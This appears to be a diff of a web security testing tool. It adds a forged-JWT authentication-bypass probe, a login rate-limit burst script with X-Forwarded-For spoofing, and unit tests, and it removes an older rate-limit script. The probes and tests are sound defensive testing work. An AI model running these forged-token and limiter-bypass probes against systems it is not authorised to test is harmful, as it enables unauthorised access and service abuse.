+ if [ "$na" != "401" ] && [ "$na" != "403" ]; then skip=$((skip+1)); continue; fi # not gated unauthenticated → N/A here
65
+ fg=$(curl -s -o /dev/null -w '%{http_code}' -X "$method" "$BASE$path" -H "Authorization: Bearer $FORGED" ${data[@]+"${data[@]}"} --max-time 15)
66
+ via="Bearer"
67
+ if ! reached "$fg" && [ -n "${COOKIE_NAME:-}" ]; then
68
+ fg=$(curl -s -o /dev/null -w '%{http_code}' -X "$method" "$BASE$path" -H "Cookie: $COOKIE_NAME=$FORGED" ${data[@]+"${data[@]}"} --max-time 15)
69
+ via="cookie:$COOKIE_NAME"
70
+ fi
71
+ if reached "$fg"; then
72
+ printf ' BYPASS %s→%s %s %s (forged token accepted via %s)\n' "$na" "$fg" "$method" "$path" "$via"; bypass=$((bypass+1))
73
+ else
74
+ printf ' ok %s→%s %s %s\n' "$na" "$fg" "$method" "$path"; ok=$((ok+1))
75
+ fi
76
+ done
77
+ echo "----------------------------------------------------------------------------------------------------"
78
+ echo "summary: $bypass forged-token BYPASS · $ok rejected · $skip not-gated (skipped)"
79
+ if [ "$bypass" -gt 0 ]; then
80
+ echo "⚠ A token with NO valid signature reached the handler on $bypass route(s) — CWE-347 broken auth."
81
+ echo " Route the guard through a VERIFYING decode (jwt.verify with the key / a checked server session),"
82
+ echo " the same path your properly-protected routes use. Never trust a decode-only (\"Unsafe\") result."
83
+ fi
84
+ exit "$bypass"
@@ -0,0 +1,89 @@
1
+ #!/usr/bin/env bash
2
+ # rate-limit-burst — verify rate limiters actually fire, and that they can't be bypassed by
3
+ # spoofing X-Forwarded-For. FACTS-driven: reads the login route + base URL from the
4
+ # probe-context.json that sits next to this script (written by websec) — no separate .env needed.
5
+ #
6
+ # Three tests:
7
+ # 1. AUTH limiter — N+1 failed logins; expect a 429 by attempt N+1. (A limit of N ALLOWS N and
8
+ #    blocks the N+1th, so sending only N false-FAILs a working limiter — the classic off-by-one.)
9
+ # 2. General limiter — burst of GETs at a public endpoint; expect 429s once over the per-IP budget.
10
+ # 3. XFF bypass — once limited, rotate X-Forwarded-For between requests. If the limit lifts, the
11
+ #    backend keys on a client-controlled header without verifying the proxy chain (bypassable).
12
+ # Exit status: number of FAILed tests (0 = none failed); 2 = no usable TARGET or a bad AUTH_LIMIT.
13
+ # Env: TARGET (or target_base_url in probe-context.json). Optional overrides:
14
+ #      AUTH_LIMIT (default 10), LOGIN_PATH, HEALTH_PATH.
15
+ # Usage: TARGET=http://localhost:3000 bash rate-limit-burst.sh
16
+ set -uo pipefail  # no -e: the probes below inspect curl's status codes themselves
17
+ ctx="$(dirname "$0")/probe-context.json"  # handed to python as argv[1], never spliced into its source
18
+ BASE="${TARGET:-$(python3 -c "import json,sys;print(json.load(open(sys.argv[1]))['target_base_url'])" "$ctx" 2>/dev/null)}"
19
+ if [ -z "${BASE:-}" ] || [ "${BASE#FILL}" != "$BASE" ]; then  # empty, or still a FILL… placeholder
20
+   echo "Set TARGET=http://host:port (or fill target_base_url in probe-context.json)"; exit 2
21
+ fi
22
+ BASE="${BASE%/}"  # drop one trailing slash so "$BASE$path" never doubles it
23
+
24
+ # Login path: explicit override → the POST .../login from probe-context → a sane default.
25
+ LOGIN_PATH="${LOGIN_PATH:-$(python3 -c "
26
+ import json, sys
27
+ c = json.load(open(sys.argv[1]))
28
+ eps = c.get('auth', {}).get('login_endpoints', []) + c.get('endpoints', {}).get('auth_endpoints', [])
29
+ cand = [e.split(' ', 1)[1] for e in eps if e.upper().startswith('POST ') and 'login' in e.lower()]
30
+ print(cand[0] if cand else '/api/auth/login')
31
+ " "$ctx" 2>/dev/null)}"
32
+ LOGIN_PATH="${LOGIN_PATH:-/api/auth/login}"  # python failed (no context file): fall back to the default
33
+ HEALTH_PATH="${HEALTH_PATH:-/api/health}"
34
+ LIMIT="${AUTH_LIMIT:-10}"
35
+ case "$LIMIT" in ''|*[!0-9]*) echo "AUTH_LIMIT must be a non-negative integer (got: $LIMIT)" >&2; exit 2 ;; esac
36
+ N=$((10#$LIMIT + 1)) # N+1: a limit of N allows N and blocks the (N+1)th; 10# keeps 08/09 from parsing as octal
37
+ fails=0
38
+
39
+ echo "=== Test 1: AUTH limiter — $N failed logins at $LOGIN_PATH (expect a 429 by #$N) ==="
40
+ saw429=0
41
+ for i in $(seq 1 "$N"); do
42
+   code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$BASE$LOGIN_PATH" \
43
+     -H 'content-type: application/json' --data '{"email":"rl-test@example.com","password":"wrong"}' --max-time 15)
44
+   printf ' attempt %2d → %s\n' "$i" "$code"
45
+   [ "$code" = "429" ] && saw429=1
46
+ done
47
+ if [ "$saw429" = "1" ]; then
48
+   echo " PASS AUTH limiter fired (saw 429)"
49
+ else
50
+   echo " FAIL AUTH limiter never fired in $N attempts — misconfigured, or the limit is > $LIMIT (raise AUTH_LIMIT)"
51
+   fails=$((fails+1))
52
+ fi
53
+ echo
54
+
55
+ echo "=== Test 2: general limiter — 200 GET $HEALTH_PATH in ~10s ==="
56
+ codes=$(seq 1 200 | xargs -P20 -I{} curl -s -o /dev/null -w '%{http_code}\n' "$BASE$HEALTH_PATH" --max-time 15)  # -I already means one run per input line
57
+ n429=$(printf '%s\n' "$codes" | grep -c '^429$' || true)
58
+ n200=$(printf '%s\n' "$codes" | grep -c '^200$' || true)
59
+ echo " 200: $n200 · 429: $n429"
60
+ if [ "$n429" -gt 0 ]; then echo " INFO general limiter fires under burst"; else
61
+   echo " INFO general limiter did not fire at 200 reqs — below threshold (raise for a real pentest)"; fi
62
+ echo
63
+
64
+ echo "=== Test 3: X-Forwarded-For spoof bypass ==="
65
+ for i in $(seq 1 "$N"); do  # warm-up: push this client over the limit before measuring
66
+   curl -s -o /dev/null -X POST "$BASE$LOGIN_PATH" -H 'content-type: application/json' \
67
+     --data '{"email":"xff-test@example.com","password":"wrong"}' --max-time 15 || true
68
+ done
69
+ baseline=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$BASE$LOGIN_PATH" \
70
+   -H 'content-type: application/json' --data '{"email":"xff-test@example.com","password":"wrong"}' --max-time 15)
71
+ echo " baseline (no XFF): $baseline"
72
+ spoofed=0
73
+ for xff in "1.2.3.4" "10.0.0.1" "192.168.1.99" "127.0.0.1" "1.1.1.1, 2.2.2.2"; do
74
+   code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$BASE$LOGIN_PATH" -H "X-Forwarded-For: $xff" \
75
+     -H 'content-type: application/json' --data '{"email":"xff-test@example.com","password":"wrong"}' --max-time 15)
76
+   printf ' XFF=%-22s → %s\n' "$xff" "$code"
77
+   { [ "$baseline" = "429" ] && [ "$code" != "429" ]; } && spoofed=$((spoofed+1))
78
+ done
79
+ if [ "$baseline" != "429" ]; then
80
+   echo " SKIP limiter not in 429 state for the baseline — can't test bypass (raise AUTH_LIMIT or the window)"
81
+ elif [ "$spoofed" -gt 0 ]; then
82
+   echo " FAIL XFF spoof bypassed the limiter ($spoofed/5) — it keys on client-supplied XFF without verifying the proxy chain"
83
+   fails=$((fails+1))
84
+ else
85
+   echo " PASS XFF spoof did NOT bypass the limiter (all stayed 429)"
86
+ fi
87
+ echo
88
+ echo "=== summary: $fails failure(s) ==="
89
+ exit "$fails"
@@ -1,6 +1,6 @@
1
1
  Metadata-Version: 2.4
2
2
  Name: websec-validator
3
- Version: 0.2.4
3
+ Version: 0.2.5
4
4
  Summary: Local-first security recon that briefs your AI coding agent: facts + tailored probe scripts, code-in / artifacts-out. No LLM, no server, no running app.
5
5
  Author: Ricardo Accioly
6
6
  License: MIT
@@ -38,6 +38,7 @@ src/websec_validator/templates/probes/bola-cross-tenant.sh
38
38
  src/websec_validator/templates/probes/bola-write-verbs.py
39
39
  src/websec_validator/templates/probes/compare-roles.sh
40
40
  src/websec_validator/templates/probes/dlp-bypass-offline.py
41
+ src/websec_validator/templates/probes/forged-token.sh
41
42
  src/websec_validator/templates/probes/hs256-brute-force.py
42
43
  src/websec_validator/templates/probes/jwt-attacks.sh
43
44
  src/websec_validator/templates/probes/mass-assignment.py
@@ -52,4 +53,5 @@ src/websec_validator/templates/reports/access-control-matrix.md.template
52
53
  src/websec_validator/templates/reports/findings-triage.md.template
53
54
  src/websec_validator/templates/reports/pentest-handover-brief.md.template
54
55
  src/websec_validator/templates/reports/per-tool-FINDINGS.md.template
56
+ tests/test_hardening.py
55
57
  tests/test_recon.py
@@ -0,0 +1,137 @@
1
+ """Tests for the 0.2.5 hardening pass (from the agent-wallet dogfood run):
2
+ - forged-token / unverified-signature bypass detection (bug: static said 'verify manually')
3
+ - scanner contamination hygiene (bug-066): SKIP_DIR drop + gitignored-secret downgrade
4
+ - rate-limit probe is FACTS-driven (bug-067)
5
+ Stdlib unittest only: python3 -m unittest discover -s tests
6
+ """
7
+ import json
8
+ import shutil
9
+ import subprocess
10
+ import sys
11
+ import tempfile
12
+ import unittest
13
+ from pathlib import Path
14
+ from unittest import mock
15
+
16
+ ROOT = Path(__file__).resolve().parents[1]
17
+ sys.path.insert(0, str(ROOT / "src"))
18
+
19
+ from websec_validator import dynamic, findings, probes, scanners # noqa: E402
20
+
21
+ FACTS = {"routes": {"endpoints": [  # fixture routes; _fake_request decides how each path answers
22
+ {"method": "GET", "path": "/api/bypass"}, # gated; accepts forged token -> BYPASS
23
+ {"method": "GET", "path": "/api/safe"}, # gated; rejects forged token -> ok
24
+ {"method": "GET", "path": "/api/ratelimited"}, # gated; forged -> 429 -> NOT a bypass
25
+ {"method": "GET", "path": "/api/public"}, # 200 with no auth -> skipped (not gated)
26
+ ]}}
27
+
28
+
29
+ def _fake_request(method, url, token=None, timeout=20, data=None, cookie=None):  # stub patched over dynamic._request; returns 2-tuples shaped like (HTTP status, body text)
30
+ authed = bool(token or cookie)  # any token or cookie at all counts as "credential sent"
31
+ if url.endswith("/api/bypass"):
32
+ return (400 if authed else 401), "x" # forged token reaches handler
33
+ if url.endswith("/api/safe"):
34
+ return 401, "x" # forged token still rejected
35
+ if url.endswith("/api/ratelimited"):
36
+ return (429 if authed else 401), "x" # rate-limited, must NOT count as bypass
37
+ if url.endswith("/api/public"):
38
+ return 200, "x" # not gated unauthenticated
39
+ return 404, ""  # any URL not listed above: 404 with an empty body
40
+
41
+
42
+ class ForgedTokenBypassTests(unittest.TestCase):  # dynamic.forged_token_bypass and dynamic._forge_jwt, with the request function stubbed
43
+ def test_detects_only_the_real_bypass(self):  # of the four FACTS routes, only /api/bypass may be reported
44
+ with mock.patch.object(dynamic, "_request", _fake_request):  # replace dynamic._request with the stub for this call
45
+ r = dynamic.forged_token_bypass("http://t", FACTS)
46
+ paths = [b["path"] for b in r["bypassed"]]
47
+ self.assertEqual(paths, ["/api/bypass"]) # exactly the one that reached the handler
48
+ self.assertEqual(r["tested"], 3) # public route skipped (baseline 200)
49
+
50
+ def test_rate_limited_is_not_a_bypass(self):  # a 401 that turns into 429 with the forged token must not be listed
51
+ with mock.patch.object(dynamic, "_request", _fake_request):
52
+ r = dynamic.forged_token_bypass("http://t", FACTS)
53
+ self.assertNotIn("/api/ratelimited", [b["path"] for b in r["bypassed"]])
54
+
55
+ def test_forged_jwt_is_three_part_and_bogus(self):  # shape check only; the token is never verified here
56
+ tok = dynamic._forge_jwt({"exp": 9999999999})
57
+ self.assertEqual(len(tok.split(".")), 3)  # three dot-separated segments
58
+ self.assertTrue(tok.split(".")[2]) # has a (deliberately invalid) signature segment
59
+
60
+
61
+ class LedgerForgedBypassTests(unittest.TestCase):  # findings.build_ledger fed a dynamic result containing one forged-token bypass
62
+ def test_bypass_becomes_critical(self):  # expects exactly one matching finding, CRITICAL, class unsafe-auth-decoder
63
+ dyn = {"forged_token_bypass": {"bypassed": [
64
+ {"method": "GET", "path": "/api/x", "baseline": 401, "forged": 400, "via": "Authorization: Bearer"}]}}
65
+ led = findings.build_ledger({}, None, dyn, [])  # NOTE(review): meaning of the other three (empty) arguments is not visible in this file
66
+ hit = [f for f in led["findings"] if "forged unsigned token" in f["title"]]  # select by title substring
67
+ self.assertEqual(len(hit), 1)
68
+ self.assertEqual(hit[0]["severity"], "CRITICAL")
69
+ self.assertEqual(hit[0]["attack_class"], "unsafe-auth-decoder")
70
+
71
+
72
+ class ScannerHygieneTests(unittest.TestCase):  # scanners._in_skip_dir, scanners.EXCLUDE_DIRS and scanners.normalize_findings
73
+ def test_in_skip_dir(self):  # paths under .claude/ and node_modules/ are skip-dir; a src/ path is not
74
+ self.assertTrue(scanners._in_skip_dir(".claude/worktrees/x/gitleaks.json"))
75
+ self.assertTrue(scanners._in_skip_dir("node_modules/dep/a.js"))
76
+ self.assertFalse(scanners._in_skip_dir("src/app/api/route.ts"))
77
+
78
+ def test_exclude_dirs_includes_agent_tooling(self):  # .claude and .worktrees must both be listed
79
+ self.assertIn(".claude", scanners.EXCLUDE_DIRS)
80
+ self.assertIn(".worktrees", scanners.EXCLUDE_DIRS)
81
+
82
+ def test_normalize_drops_skipdir_contamination(self):  # the hit under .claude/ is dropped and counted; the src/ hit is kept
83
+ trivy = {"Results": [
84
+ {"Target": ".claude/worktrees/copy/websec-out/scanners/gitleaks.json",
85
+ "Secrets": [{"RuleID": "aws", "Title": "AWS key", "Match": "AKIA" + "A" * 16, "StartLine": 1}]},
86
+ {"Target": "src/app/route.ts",
87
+ "Secrets": [{"RuleID": "aws", "Title": "AWS key", "Match": "AKIA" + "B" * 16, "StartLine": 1}]},
88
+ ]}
89
+ with tempfile.TemporaryDirectory() as d:
90
+ d = Path(d)
91
+ (d / "trivy.json").write_text(json.dumps(trivy))  # fake scanner output on disk
92
+ res = [{"key": "trivy", "output": str(d / "trivy.json"), "name": "Trivy", "category": "sca"}]
93
+ summary = scanners.normalize_findings(res, d, target=None)
94
+ files = [f["file"] for f in json.loads((d / "findings.json").read_text())]  # read back the findings.json found in d after the call
95
+ self.assertIn("src/app/route.ts", files)
96
+ self.assertNotIn(".claude/worktrees/copy/websec-out/scanners/gitleaks.json", files)
97
+ self.assertEqual(summary["contamination_dropped"], 1)
98
+
99
+ @unittest.skipUnless(shutil.which("git"), "git required")
100
+ def test_gitignored_secret_is_downgraded(self):  # gitignored file's secret: LOW + "local-only" title; the other file stays HIGH
101
+ trivy = {"Results": [
102
+ {"Target": "secret.local",
103
+ "Secrets": [{"RuleID": "aws", "Title": "AWS key", "Match": "AKIA" + "C" * 16, "StartLine": 1}]},
104
+ {"Target": "src/real.ts",
105
+ "Secrets": [{"RuleID": "aws", "Title": "AWS key", "Match": "AKIA" + "D" * 16, "StartLine": 1}]},
106
+ ]}
107
+ with tempfile.TemporaryDirectory() as d:
108
+ d = Path(d)
109
+ subprocess.run(["git", "init", "-q", str(d)], check=True)  # presumably so the ignore check has a real repo to query — confirm in scanners
110
+ (d / ".gitignore").write_text("*.local\n")  # pattern that matches secret.local
111
+ out = d / "out"
112
+ out.mkdir()
113
+ (out / "trivy.json").write_text(json.dumps(trivy))
114
+ res = [{"key": "trivy", "output": str(out / "trivy.json"), "name": "Trivy", "category": "sca"}]
115
+ summary = scanners.normalize_findings(res, out, target=d)
116
+ by_file = {f["file"]: f for f in json.loads((out / "findings.json").read_text())}
117
+ self.assertEqual(by_file["secret.local"]["severity"], "LOW") # gitignored → downgraded
118
+ self.assertIn("local-only", by_file["secret.local"]["title"])
119
+ self.assertEqual(by_file["src/real.ts"]["severity"], "HIGH") # tracked → unchanged
120
+ self.assertEqual(summary["local_only_downgraded"], 1)
121
+
122
+
123
+ class ProbeRegistrationTests(unittest.TestCase):  # probes.ALWAYS / PROBES / applicable() / build_context()
124
+ def test_forged_token_always_staged(self):  # listed in ALWAYS and PROBES, and returned by applicable() even with empty targeting
125
+ self.assertIn("forged-token", probes.ALWAYS)
126
+ self.assertIn("forged-token", probes.PROBES)
127
+ self.assertIn("forged-token", probes.applicable({"routes": {"targeting": {}}}))
128
+
129
+ def test_context_has_reads(self):  # endpoints["reads"] holds only the GET route, formatted "METHOD path"
130
+ ctx = probes.build_context({"routes": {"endpoints": [
131
+ {"method": "GET", "path": "/api/a"}, {"method": "POST", "path": "/api/b"}], "targeting": {}}, "auth": {}})
132
+ self.assertIn("reads", ctx["endpoints"])
133
+ self.assertEqual(ctx["endpoints"]["reads"], ["GET /api/a"])
134
+
135
+
136
+ if __name__ == "__main__":  # allow running this file directly as a script
137
+ unittest.main()
@@ -1,136 +0,0 @@
1
- #!/usr/bin/env bash
2
- #
3
- # rate-limit-burst.sh — verify rate limiters actually fire under load.
4
- #
5
- # Three tests:
6
- # 1. AUTH_RATE_LIMIT — N failed login attempts; expect a 429 by attempt K
7
- # (the project's documented per-IP login throttle).
8
- # 2. General apiRateLimiter — burst of GET requests against a public health
9
- # endpoint; expect 429s once over the per-IP budget.
10
- # 3. X-Forwarded-For bypass — repeat (1) but rotate the XFF header between
11
- # requests. If the backend honors XFF for rate-limit keying WITHOUT
12
- # verifying the proxy chain, attackers bypass the limiter.
13
- #
14
- # Usage: ./rate-limit-burst.sh
15
- set -euo pipefail
16
- cd "$(dirname "$0")"
17
-
18
- [[ -f .env ]] || { echo "No .env found" >&2; exit 1; }
19
-
20
- read_env() {
21
- local key="$1"
22
- python3 -c "
23
- for l in open('.env'):
24
- l = l.rstrip('\n')
25
- if l.startswith('#') or '=' not in l: continue
26
- k, v = l.split('=', 1)
27
- if k.strip() == '$key':
28
- print(v); break
29
- "
30
- }
31
-
32
- TARGET="$(read_env ZAP_TARGET)"
33
- [[ -n "$TARGET" ]] || { echo "ZAP_TARGET missing from .env" >&2; exit 2; }
34
-
35
- # TODO: adjust login path and public health path to match your API.
36
- LOGIN_PATH="/api/auth/login"
37
- HEALTH_PATH="/api/health"
38
-
39
- PASS_COUNT=0
40
- FAIL_COUNT=0
41
- FAIL_LINES=()
42
-
43
- # === Test 1: AUTH_RATE_LIMIT ===
44
- echo "=== Test 1: AUTH_RATE_LIMIT (expected ≥1 of 10 attempts to be 429) ==="
45
- codes_seen=()
46
- for i in $(seq 1 10); do
47
- code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET$LOGIN_PATH" \
48
- -H 'Content-Type: application/json' \
49
- -d '{"email":"rl-test@example.com","password":"wrong"}')
50
- codes_seen+=("$code")
51
- printf ' attempt %2d → %s\n' "$i" "$code"
52
- done
53
- if printf '%s\n' "${codes_seen[@]}" | grep -q '^429$'; then
54
- echo " PASS AUTH_RATE_LIMIT fires (saw 429)"
55
- PASS_COUNT=$((PASS_COUNT+1))
56
- else
57
- echo " FAIL AUTH_RATE_LIMIT never fired — limiter may be misconfigured"
58
- FAIL_COUNT=$((FAIL_COUNT+1))
59
- FAIL_LINES+=("AUTH_RATE_LIMIT did not fire in 10 attempts")
60
- fi
61
- echo
62
-
63
- # === Test 2: General health burst ===
64
- echo "=== Test 2: 200 GET ${HEALTH_PATH} requests in ~10s ==="
65
- codes_file=$(mktemp)
66
- trap 'rm -f "$codes_file"' EXIT
67
- seq 1 200 | xargs -n 1 -P 20 -I{} curl -s -o /dev/null -w '%{http_code}\n' "$TARGET$HEALTH_PATH" > "$codes_file"
68
-
69
- total=$(wc -l < "$codes_file" | tr -d ' ')
70
- two_oh_oh=$(grep -c '^200$' "$codes_file" || true)
71
- four_two_nine=$(grep -c '^429$' "$codes_file" || true)
72
- other=$((total - two_oh_oh - four_two_nine))
73
- echo " Total responses: $total"
74
- echo " 200: $two_oh_oh"
75
- echo " 429: $four_two_nine"
76
- echo " Other: $other"
77
- if [[ "$four_two_nine" -gt 0 ]]; then
78
- echo " INFO apiRateLimiter fires under burst (saw 429s)"
79
- else
80
- echo " INFO apiRateLimiter did NOT fire — 200 reqs is below threshold."
81
- echo " (general limit is per-IP; for a pentest, escalate to ~5000 reqs)"
82
- fi
83
- echo
84
-
85
- # === Test 3: X-Forwarded-For bypass attempt ===
86
- echo "=== Test 3: try XFF spoof to bypass AUTH_RATE_LIMIT ==="
87
- echo " (If the backend respects 'trust proxy = 1' correctly, spoofed XFF"
88
- echo " headers from us — a direct client — should be IGNORED for rate-limit"
89
- echo " keying.)"
90
-
91
- # First, get rate-limited so subsequent requests are blocked
92
- for i in $(seq 1 7); do
93
- curl -s -o /dev/null -X POST "$TARGET$LOGIN_PATH" \
94
- -H 'Content-Type: application/json' \
95
- -d '{"email":"xff-test@example.com","password":"wrong"}' >/dev/null
96
- done
97
-
98
- code_baseline=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET$LOGIN_PATH" \
99
- -H 'Content-Type: application/json' \
100
- -d '{"email":"xff-test@example.com","password":"wrong"}')
101
- echo " baseline (no XFF): $code_baseline"
102
-
103
- spoofed_pass_count=0
104
- for xff in "1.2.3.4" "10.0.0.1" "192.168.1.99" "127.0.0.1" "1.1.1.1, 2.2.2.2"; do
105
- code=$(curl -s -o /dev/null -w '%{http_code}' -X POST "$TARGET$LOGIN_PATH" \
106
- -H 'Content-Type: application/json' \
107
- -H "X-Forwarded-For: $xff" \
108
- -d '{"email":"xff-test@example.com","password":"wrong"}')
109
- printf ' XFF=%-25s → %s\n' "$xff" "$code"
110
- if [[ "$code_baseline" == "429" && "$code" != "429" ]]; then
111
- spoofed_pass_count=$((spoofed_pass_count + 1))
112
- fi
113
- done
114
-
115
- if [[ "$code_baseline" != "429" ]]; then
116
- echo " SKIP AUTH limiter not in 429 state for baseline — can't test bypass"
117
- elif [[ $spoofed_pass_count -gt 0 ]]; then
118
- echo " FAIL XFF spoof bypassed AUTH_RATE_LIMIT ($spoofed_pass_count probes)"
119
- FAIL_COUNT=$((FAIL_COUNT+1))
120
- FAIL_LINES+=("XFF spoof bypasses AUTH_RATE_LIMIT — limiter may be keyed on req.ip without trust proxy validation")
121
- else
122
- echo " PASS XFF spoof did NOT bypass the limiter (all stayed 429)"
123
- PASS_COUNT=$((PASS_COUNT+1))
124
- fi
125
- echo
126
-
127
- echo "=== Summary ==="
128
- echo " PASS: $PASS_COUNT"
129
- echo " FAIL: $FAIL_COUNT"
130
- if [[ $FAIL_COUNT -gt 0 ]]; then
131
- echo
132
- echo "FAILED:"
133
- printf ' - %s\n' "${FAIL_LINES[@]}"
134
- exit 1
135
- fi
136
- echo "Rate limiters behave as expected."